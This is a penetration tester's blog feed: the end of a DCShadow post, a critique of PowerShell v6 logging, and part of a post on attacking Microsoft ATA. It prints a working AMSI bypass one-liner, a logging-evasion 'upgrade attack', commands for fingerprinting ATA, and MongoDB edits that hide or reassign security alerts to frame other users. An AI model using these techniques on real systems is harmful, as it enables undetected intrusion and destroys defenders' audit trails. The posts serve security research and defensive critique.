<b> </b> Insufficient Privileges<br />
ERROR kuhl_m_lsadump_dcshadow_force_sync_partition ; IDL_DRSReplicaAdd<br />
DC=whatever,DC=com 0x80090322 (2148074274)<br />
<br />
If you get an error like above, make sure that mimkatz is running as SYSTEM (use !processtoken). Please refer to Executing DCShadow section above. <br />
<br />
Permission Errors <br />
If you see an error during registration like "Unable to add object via ldap". Then make sure that you are "pushing" with DA privileges from mimikatz or you have set proper permissions. <br />
<br />
In some cases, when unregistration fails (see the video!), you may have to cleanup the object created in the CN=Servers in the Configuration Container and/or SPNs of the computer object which is registered as Fake DC. To clear SPNs I am using this simple command from the activedirectorymodule.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Set-ADComputer -ServicePrincipalNames $null -Identity ops-user12
PS C:\> Set-ADComputer -ServicePrincipalNames @{Add="WSMAN/ops-user12","WSMAN/ops-user12.offensiveps.com","TERMSRV/OPS-USER12","TERMSRV/ops-user12.offensiveps.com","RestrictedKrbHost/OPS-USER12","HOST/OPS-USER12","RestrictedKrbHost/ops-user12.offensiveps.com","HOST/ops-user12.offensiveps.com"} -Identity ops-user12</textarea></pre>
Here is a video showing the above attacks and deception.</div>
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/YLMCeAZk1Ro?rel=0" width="560"></iframe><br />
<br />
Hope you enjoyed the post!<br />
<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-88567353188673499182018-01-14T23:01:00.000+05:302018-01-25T09:38:44.445+05:30A Critique of Logging Capabilities in PowerShell v6<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
PowerShell 6 <a href="https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/">was released</a> couple of days back. PowerShell v6 is the core version, that is, it is open source, cross platform and it is NOT Windows PowerShell which continues to be the default one on Windows. As per <a href="https://blogs.msdn.microsoft.com/powershell/2017/07/14/powershell-6-0-roadmap-coreclr-backwards-compatibility-and-more/">this blog</a> by PowerShell Team, going forward, PowerShell core is the future (Windows PowerShell will still get critical bug-fixes.)</div>
<div style="text-align: justify;">
PowerShell Team, over past 2-3 years, has constantly improved the security controls in PowerShell. The defining moment was, of course, <a href="https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/">PowerShell ♥ the Blue<span style="color: black;"> </span>Team</a> where the PowerShell Team detailed many interesting features like System-wide Transcription, Deep Script Block Logging, AntiMalware Scan Interface, Protected Event Logging, Constrained Language Mode (with Applocker "Allow" mode) etc. Comparing PowerShell v2 - which comes installed by default in Windows 7 - with PowerShell 5.1 which is the default for Windows 10, the effort to restrict, track and log PowerShell usage on a box is clearly visible and effective. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Having used PowerShell for 7+ years for red team assessments and penetration tests, I look forward to every major release of PowerShell to change and upgrade my techniques and methodologies. With PowerShell 5.1, as an attacker, I am actually afraid that whatever I do on a foothold or launchpad box may be logged and (hopefully) monitored. During my Offensive PowerShell and Active Directory training, the attendees who are industry practitioners and researchers, always appreciate the logging capabilities of PowerShell and try to implement them in their organization's networks.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But with PowerShell v6, PowerShell logging features have been drastically reduced! This is almost certainly because v6 is based on .NET Core but there has been no authoritative word about it. This post is to compare the most interesting logging capabilities of PowerShell v6 with Windows PowerShell 5.1.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Deployment</h3>
<div style="text-align: justify;">
All the enhanced logging capabilities PowerShell has, can be deployed using Group Policy. But this doesn't hold true for v6! To enable whatever logging for v6, a script RegisterManifest.ps1 (found in the $PSHOME directory) needs to be executed on each machine to register PowerShellCore event provider (PowerShell remoting can be used to run this script on scale). Thanks Satoshi for <a href="https://twitter.com/standa_t/status/951468256560164864">pointing this out</a>. <br />
<br />
The ability to configure logging from Group Policy is much easier to manage and harder to tamper with whereas the PowerShellCore event provider can be unregistered by using the "-UnRegister" parameter of the script.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
System-wide Transcription</h3>
<div style="text-align: justify;">
When System-wide transcription is enabled, all the activity for every PowerShell host (powershell.exe, powershell_ise.exe, System.Management.Automation.dll or other custom host) is logged to the specified directory or the user's "My Documents" directory if none is specified. With proper implementation, that is, forwarding logs to secure storage and correlation, system-wide transcription could be very effective in detecting PowerShell attacks. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is how system-wide transcription looks like for PowerShell 5.1 (The execution is using InstallUtil)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPr__wnqguL1wv7vXzNTP8tt-xV-8x2Po3YOHJWJrg26U-MvI2n-hT4mhDOqvrBgEBF9S9lBmKPxr6EblqVLV9GLVfPkwem-LhnhbHa0oSx0xjUGHY6HuNKB_Lmppv_aZFyzbCnZA7kJY/s1600/transcription.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="815" data-original-width="982" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPr__wnqguL1wv7vXzNTP8tt-xV-8x2Po3YOHJWJrg26U-MvI2n-hT4mhDOqvrBgEBF9S9lBmKPxr6EblqVLV9GLVfPkwem-LhnhbHa0oSx0xjUGHY6HuNKB_Lmppv_aZFyzbCnZA7kJY/s400/transcription.png" width="400" /></a></div>
<div style="text-align: justify;">
PowerShell v6 does not support system-wide transcription.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Script Block Logging</h3>
<div style="text-align: justify;">
PowerShell v5.1 has two types of script block logging: Warning level auto logging and Verbose logging that can be configured. Warning level auto logging logs known bad/suspicious commands and script blocks and logs them in Microsoft-Windows-PowerShell/Operational log as Event ID 4104 Warning. When Verbose logging is turned on, which can be done using Group Policy, PowerShell commands are logged as Event ID 4104 Verbose. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsIqhuWUlqkt7ci_tbzXevLiCj3R-IvJw7PAX25rzJBr0nDuncpOxCB9_3C2XCcFeFBrpZgvFRSGZ4ii9rMQYAOlzB7WQawETdoEk_xAJ8_psoAmYmyfrBNkk6Mye858lLg9Yrh6XwFI/s1600/Logging.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="1320" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAsIqhuWUlqkt7ci_tbzXevLiCj3R-IvJw7PAX25rzJBr0nDuncpOxCB9_3C2XCcFeFBrpZgvFRSGZ4ii9rMQYAOlzB7WQawETdoEk_xAJ8_psoAmYmyfrBNkk6Mye858lLg9Yrh6XwFI/s400/Logging.png" width="400" /></a></div>
<div style="text-align: justify;">
Yes, there are public bypasses for script block logging as blogged by Ryan Cobb <a href="https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html">here</a> and <a href="https://cobbr.io/ScriptBlock-Logging-Bypass.html">here</a>, still, it increases attacker costs.<br />
<br />
PowerShell v6 has no automatic script block logging. But when The PowerShellCore provider is created, the suspicious script blocks are logged with Event ID 4103 in the PowerShellCore logs.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhncgJluRXTgF_mgRECFv8BF2htubQol343YjCN_yy1rH-7ptzLGxkG5yvVoEIxoMk1M12jSBPnwnFM6eYlyctekYMROEzWg-FrzDjz7ZVunilPUWWVeZMbH-0fzcdijWjk4yMbvnzTOcw/s1600/v6_logging.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="664" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhncgJluRXTgF_mgRECFv8BF2htubQol343YjCN_yy1rH-7ptzLGxkG5yvVoEIxoMk1M12jSBPnwnFM6eYlyctekYMROEzWg-FrzDjz7ZVunilPUWWVeZMbH-0fzcdijWjk4yMbvnzTOcw/s400/v6_logging.png" width="400" /></a></div>
Interestingly, while testing the warning level logs, I found out that v6 excels over v5.1 and logs less false positives. For example, one of suspicious strings (see <a href="https://github.com/PowerShell/PowerShell/blob/v6.0.0/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1516-L1652">code here</a>) "GetMembers" is logged by 5.1 even if it is just executed senselessly.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivPQvl8gKPZIgOMjaZWsI42EuU9J8SCYx5C_zrgtcH5CigVilVgvi_PG4T5NMlbc6ZeS4osKMlTelWrKAaxjfxkDJzVIL7UThUZtHwFH2CYRFZ8bwQ7buBKcJcqc-bOEJODJH6dA4GBZc/s1600/v5_falsepositive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1260" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivPQvl8gKPZIgOMjaZWsI42EuU9J8SCYx5C_zrgtcH5CigVilVgvi_PG4T5NMlbc6ZeS4osKMlTelWrKAaxjfxkDJzVIL7UThUZtHwFH2CYRFZ8bwQ7buBKcJcqc-bOEJODJH6dA4GBZc/s400/v5_falsepositive.png" width="400" /></a></div>
But in case of v6, the above is not logged unless, there is a proper use of "GetMembers".<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd1RtSl_b2AXqqzIcCUHCF2Mzy3uRz6iOzvoQZv4VS2WchyIqxBkoD7EIG-Vy-rkuXZMQfw_-glgPm6czny9EcrpFWt0nHGLsEFu9tXryN474_pkBduHWtciRG054clPTD5pJRRQF8Cg/s1600/v6_truepositive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="590" height="327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd1RtSl_b2AXqqzIcCUHCF2Mzy3uRz6iOzvoQZv4VS2WchyIqxBkoD7EIG-Vy-rkuXZMQfw_-glgPm6czny9EcrpFWt0nHGLsEFu9tXryN474_pkBduHWtciRG054clPTD5pJRRQF8Cg/s400/v6_truepositive.png" width="400" /></a></div>
I find this very interesting and will have an in-depth look at it later on. May be, it could help in some interesting findings.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
AntiMalware Scan Interface (AMSI)</h3>
<div style="text-align: justify;">
AMSI provides the content of a script tor script block to the registered antivirus before execution takes place. This enables the antivirus to detect known bad scripts and script blocks regardless of input method (disk, memory, manual) and even encoded and obfuscated scripts. I spoke about AMSI at BlackHat USA 2016 and did a <a href="http://www.labofapenetrationtester.com/2016/09/amsi.html">detailed blog post</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Fortunately, AMSI is enabled for PowerShell v6 as well. Although, <a href="https://twitter.com/mattifestation/status/735261176745988096">Matt's bypass</a> still works with just a minor modification. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)
</textarea></pre>
But, once again, since it still increases cost to an attacker, its great to have AMSI in v6.<br />
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: left;">
Constrained Language Mode</h3>
<div style="text-align: justify;">
If "Allow mode" is enforced for Applocker or Device Guard, PowerShell is restricted automatically to the Constrained Language Mode which restricts Windows API, interaction with COM etc. See <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes?view=powershell-5.1">Language Modes</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
That is not the case with v6!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKNHBjwutIjGEzkYA2qXcc6aGl7mDPmZZdkEceh4Qj-B35bKPsEsxEHQV3ptZMdGS3lrIHC0dBa9_wEjQLDcVVT457q3-envgYnM8Ztu_Y8g84ZeXNLHMuke7VuoDKBlu2TEVqlg11W7U/s1600/PowerShellv6_LanguageMode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="1069" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKNHBjwutIjGEzkYA2qXcc6aGl7mDPmZZdkEceh4Qj-B35bKPsEsxEHQV3ptZMdGS3lrIHC0dBa9_wEjQLDcVVT457q3-envgYnM8Ztu_Y8g84ZeXNLHMuke7VuoDKBlu2TEVqlg11W7U/s400/PowerShellv6_LanguageMode.png" width="400" /></a></div>
<h3>
</h3>
</div>
<div style="text-align: justify;">
<h3>
</h3>
<h3>
Introducing the PowerShell Upgrade Attack</h3>
</div>
<div style="text-align: justify;">
PowerShell downgrade attack is popular with red teams. If you can run PowerShell v2, ALL security measures we have seen are bypassed as v2 simply doesn't support them. Lee provided <a href="http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/">an excellent guide</a> on how to detect and prevent such attacks. If v2 is blocked or no required .NET version is installed, what to do? Simply run <b>pwsh</b> from your PowerShell session and you will drop in a new PowerShell session (v6 - if installed) which has minimal security features compared to v5/5.1. I am calling it the <b>PowerShell Upgrade Attack</b> <b>:P</b>. On a serious note, please keep in mind that Windows PowerShell - with enhanced logging - is the default one on Windows OS. Also, v6 is not an update, it needs to be installed separately. Windows PowerShell and PowerShell Core can be installed on a single machine and both will work independently. <br />
<br />
<h3>
So, what next?</h3>
I hold the PowerShell Team in high regard (for creating such a useful tool, being open to criticism and acting on the feedback) and quite confident (and hope) that they will address these shortcomings soon. Jeffery already <a href="https://twitter.com/jsnover/status/951118940293414912">tweeted that</a> the Constrained Language Mode will be fixed in 6.1. But, if your production environment is working fine with Windows PowerShell v5/5.1, I would not advise to install v6 on any system (at least not the production ones). </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
UPDATE (25-Jan-2018) - <a href="https://blogs.msdn.microsoft.com/powershell/2018/01/24/powershell-core-6-1-roadmap/">The PowerShell Core Roadmap is published</a> and there is no mention of bringing Core logging in parity with Windows PowerShell 5.1. Thankfully, the DeviceGuard/Applocker policy enforcement will get fixed. <br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-73434302248951410472017-08-11T21:30:00.000+05:302018-05-03T22:15:43.942+05:30Week of Evading Microsoft ATA - Day 5 - Attacking ATA, Closing thoughts and Microsoft's response<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
This is Day 5 of Week of Evading Microsoft ATA. The week has been split in the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day3.html">Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b>Day 5 - Attacking ATA deployment, limitations of research and mitigation</b><br />
<div>
<b><br />
</b></div>
<div>
Welcome to the last day of the Week of Evading ATA. We have seen how ATA can be bypassed and avoided during a security assessment. Today let's see how we can attack ATA deployment. We will also discuss limitations of the research against ATA, some closing thoughts and some general mitigation against AD attacks. </div>
<div>
<br /></div>
<div>
<b>Attacking ATA</b></div>
<div>
<b><br />
</b> <b>Find ATA Installation</b></div>
<div>
So how do we spot ATA? Before 1.8, it was possible to simply run banner grabbing against web services running on port 443 and look for "Microsoft Advanced Threat Analytics". An example PowerShell command for this:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};(New-Object Net.Webclient).DownloadString('https://IPAddr').Contains('Microsoft Advanced Threat Analytics')
</textarea></pre>
</div>
<div>
But ATA 1.8 uses Single Sign-On and it is not possible to grab the banner without authenticatiob. But we are not out of options. We can simply look for certificate used by the ATA console. By default, ATA console uses a self-signed certificate issued to "ATACenter".</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_lUpfh_W6GYEOE5fAddZwjrZDg2FpL6pJT4KG_fOPyBg_4jGeF5pQej-OFLA5h8B-Elw9qtycPYDzDHgM8pGasFlVFllZUwkK5pMb9a_v9JE2yKZY0k0e7a4NpnP1gTnt95XTaoMKTA/s1600/ATA-Certificate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="747" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_lUpfh_W6GYEOE5fAddZwjrZDg2FpL6pJT4KG_fOPyBg_4jGeF5pQej-OFLA5h8B-Elw9qtycPYDzDHgM8pGasFlVFllZUwkK5pMb9a_v9JE2yKZY0k0e7a4NpnP1gTnt95XTaoMKTA/s400/ATA-Certificate.png" width="373" /></a></div>
ATA uses local users and groups of the ATA Center, the ATA documentation <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-role-groups">suggests</a> having three types of role groups ATA Administrators, ATA Users and ATA Viewers. If the target deployment uses the exact same group names as suggested, we should be able to enumerate ATA by enumerating local groups on machines in the domain using PowerView:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-NetLocalGroup -ComputerName ata-center -GroupName "ATA Administrators"</textarea></pre>
Also, I am quite sure that smart folks out there (like from nmap or metasploit) will soon include ATA in their service identification.</div>
<div>
<br />
<b>Admin Access</b><br />
Once we know that there is an ATA deployment in a domain we may try attacking it. There are a number of interesting things which can be done with it. If the ATA Center is the part of the target domain and we have escalated privileges to domain admin or have got local admin access to the Center, we can have much fun. ATA subscribes to the concept of "if its admin its game over". By default, all the members of the local administrators group (local admins, domain admins) on the ATA Center have administrative access to the ATA console. We can resolve alerts, add exclusions, enumerate honey tokens etc. with that access.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxC0gnso-8-P0ZjjKrC9NVper_qYym1dlr1gIUQFcnh0_rkCMCH-BhjJfwTeB_5XHrEZib_vKRtl5lNmNLbCdWBEMCwy3J6htQsBIhLnKp8HsOQhkruTBF93JhMiKFC_VRS9yMb_Uy6TE/s1600/Exclusions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxC0gnso-8-P0ZjjKrC9NVper_qYym1dlr1gIUQFcnh0_rkCMCH-BhjJfwTeB_5XHrEZib_vKRtl5lNmNLbCdWBEMCwy3J6htQsBIhLnKp8HsOQhkruTBF93JhMiKFC_VRS9yMb_Uy6TE/s400/Exclusions.png" width="400" /></a></div>
While this is nothing ground shattering, since ATA specifically targets domain dominance and lateral movement, having the ability to add exceptions for our IP, users and attacks is very useful.<br />
<b><br />
</b> <b>Backend MongoDB</b><br />
<br />
ATA Center uses MongoDB to store entities, entity profiles, Kerberos requests, suspicious activities and more. It listens only on localhost but needs no authentication to connect to! This means if we have administrative access to the ATA Center we can do very interesting things. Let's see two of them:<br />
<b><br />
</b> <b>Tampering with alerts</b><br />
Let's say we want to tamper with suspicious activities from our foothold user, say, labuser. Let's first look for SourceAccountId from the UniqueEntity collection for labuser. I am using <a href="https://robomongo.org/download">RoboMongo</a> for accessing the mongodb:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">db.getCollection('UniqueEntity').find({"Name" : "lab user"})</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4FRHmtOEx0_nlEO0DRkc5tqUYALbfICkVEijEpyT1oEE26ndPMUaBG-quUDDMFUo6OCb1u9Oyfb3nge-ekBUniHeHzuQEeU7bZu0i99oo6EU3KO3Bn-_AMOd_UqlPwyAzH7DWSWYubro/s1600/labuser_id_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="399" data-original-width="1600" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4FRHmtOEx0_nlEO0DRkc5tqUYALbfICkVEijEpyT1oEE26ndPMUaBG-quUDDMFUo6OCb1u9Oyfb3nge-ekBUniHeHzuQEeU7bZu0i99oo6EU3KO3Bn-_AMOd_UqlPwyAzH7DWSWYubro/s400/labuser_id_1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Once we have the id of our account, let's have a look in the SuspiciousActivity collection for alerts for our user:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: black; color: white;">db.getCollection('SuspiciousActivity').find({"DetailsRecords.SourceAccountId" : "bf2a6a4f-03bb-4d79-a5a1-9eea52e726f1"})</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwOpUHfeP71L6zmdh_hzPQfi-aS0764Aqyc-3LfhXnKM1EqmOWTHtmLqgx9pRRGr6AGQ01MhE274G3ApUlozdDX51Lk5poIRw3NPxXgkgNd56ShyphenhyphenE0VO_-4GTNoGDFWJ6Pdx3V1DhA5g/s1600/labuser_activities.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="496" data-original-width="1239" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiwOpUHfeP71L6zmdh_hzPQfi-aS0764Aqyc-3LfhXnKM1EqmOWTHtmLqgx9pRRGr6AGQ01MhE274G3ApUlozdDX51Lk5poIRw3NPxXgkgNd56ShyphenhyphenE0VO_-4GTNoGDFWJ6Pdx3V1DhA5g/s320/labuser_activities.png" width="320" /></a></div>
Let's have a look at the latest suspicious activity for labuser:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUjwvM0NgnV8xQ5v_Ub8RJjcjuqkpZOUbE4A3Ls3PBM9Tzbfz4jlCTkt-HXhbj44JXn8DAnz8dORroj2O6WMpU8dHZ3gD7cQ7SKmBwpOwzqoE9w1kMfRa5gAgbbNoKht7QLGLoRJbFg9M/s1600/Abnormal_Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="883" data-original-width="909" height="387" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUjwvM0NgnV8xQ5v_Ub8RJjcjuqkpZOUbE4A3Ls3PBM9Tzbfz4jlCTkt-HXhbj44JXn8DAnz8dORroj2O6WMpU8dHZ3gD7cQ7SKmBwpOwzqoE9w1kMfRa5gAgbbNoKht7QLGLoRJbFg9M/s400/Abnormal_Protocol.png" width="400" /></a></div>
An unusual protocol alert, most probably an overpass-the-hash, going by the time stamp and other details, this is the alert in the ATA console:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjitHyoOVmV3aL4MGJtuV8Xid04lPUNuxTURxDmAfSq9FJBQ9vyGEKeevjp09V3OzGPvvtf6W7TJOXOjSbd-nn91suT6x9_fKgnwOa0DwvJBwk3kLck2_Hn59kTohTqQLoy0SXwADaNjJc/s1600/ATA_Alert_Abnormal_Protocol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="745" data-original-width="1244" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjitHyoOVmV3aL4MGJtuV8Xid04lPUNuxTURxDmAfSq9FJBQ9vyGEKeevjp09V3OzGPvvtf6W7TJOXOjSbd-nn91suT6x9_fKgnwOa0DwvJBwk3kLck2_Hn59kTohTqQLoy0SXwADaNjJc/s400/ATA_Alert_Abnormal_Protocol.png" width="400" /></a></div>
Now, we can simply lookup for id of another user, say termadmin, and replace that by editing the SourceAccountId for that particular alert in the SuspiciousActivity collection. Let's do it not only for labuser but other two user's in the above alert as well for the sake of demonstration:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOHA2tkBHnOXbsw9vS6W7oMtHlny8v4b4larRcSA9vfxq14qR5Bt2VHUldkE-uj8TtWfs5sHg62t7A1pxpSmsWyxGT7O6Z-phpr6FZ7DiCYVFKk6J932Fy21eYeDy53U9A9QF7Ti3YfVw/s1600/ATA_Alert_Abnormal_Protocol_Modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="746" data-original-width="1234" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOHA2tkBHnOXbsw9vS6W7oMtHlny8v4b4larRcSA9vfxq14qR5Bt2VHUldkE-uj8TtWfs5sHg62t7A1pxpSmsWyxGT7O6Z-phpr6FZ7DiCYVFKk6J932Fy21eYeDy53U9A9QF7Ti3YfVw/s400/ATA_Alert_Abnormal_Protocol_Modified.png" width="400" /></a></div>
Sweet, isn't it :D<br />
<br />
We can do the same for Computers as well to "frame" some other computer for attacks like Malicious replication of directory services and so on.<br />
<br />
<b>Hiding the alerts</b><br />
Let's say we simply want to hide an alert. Entries in the SuspiciousActivity collection has a proeprty called "IsVisible". Set it to false and the alert vanishes from the console. Let's go after the latest DCSync alert:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiV6pr6tnt9sqAB0ae59axwMsiHc6ZYXV08CZi0-hlUHwwwxlmqLD94eERJzCIpEtjSg8VeziwFmvhDTYktcXK42IkWJNZ4qi5FprCy7h_FDMoZXU74fi4g8WtpFRtiHJTAW_zpL_zne8/s1600/DCSync_Detection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="597" data-original-width="1317" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiV6pr6tnt9sqAB0ae59axwMsiHc6ZYXV08CZi0-hlUHwwwxlmqLD94eERJzCIpEtjSg8VeziwFmvhDTYktcXK42IkWJNZ4qi5FprCy7h_FDMoZXU74fi4g8WtpFRtiHJTAW_zpL_zne8/s400/DCSync_Detection.png" width="400" /></a></div>
Let's look for "TitleKey" : "DirectoryServicesReplicationSuspiciousActivityTitle" in the SuspiciousActivity collection and edit the latest one to change "IsVisible" : true to "IsVisible" : false:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl0geU_vHKcK2NGzjRqVPeFTFnLiejYAWJR_fjVy5UsbdaJpaq0pyg22WpuNRJ8IfHVYhgbDbnXG6t23HpEI3KXu60rbHGZqEUvbClQOf7HXXdDgChrvaNu5MHGf8Ff_Hkal-6rG6CKjk/s1600/DCSync_Edit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="570" data-original-width="974" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl0geU_vHKcK2NGzjRqVPeFTFnLiejYAWJR_fjVy5UsbdaJpaq0pyg22WpuNRJ8IfHVYhgbDbnXG6t23HpEI3KXu60rbHGZqEUvbClQOf7HXXdDgChrvaNu5MHGf8Ff_Hkal-6rG6CKjk/s400/DCSync_Edit.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And the result is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhssD55IDEmTAbaS2MrauIJpuhvf-WCH7e2yqlvmOtdlOBvF-wBDWUjoO6K2n4IchnWeatOG6W9pvkOF0NVsSeuq3I0EiXLNOFEy0ePX14Ibd9n2ZnyMtWa3yuvYSyYzVMs0GyUFVb58kc/s1600/DCSybc_NoAlert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1287" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhssD55IDEmTAbaS2MrauIJpuhvf-WCH7e2yqlvmOtdlOBvF-wBDWUjoO6K2n4IchnWeatOG6W9pvkOF0NVsSeuq3I0EiXLNOFEy0ePX14Ibd9n2ZnyMtWa3yuvYSyYzVMs0GyUFVb58kc/s400/DCSybc_NoAlert.png" width="400" /></a></div>
Nice! This helps us in covering tracks in a post-DA lateral movement scenario.<br />
<br />
Of course, no surprise, we modified the database and the console displays the modified values. But as these are security alerts, having access to just one box - ATA Center - drastically reduces the security posture of the entire organisation.<br />
<br />
<b>Limitations of the research</b><br />
Copy paste from my BlackHat slides:<br />
- Focus of all the bypasses is on Anomaly based detections.<br />
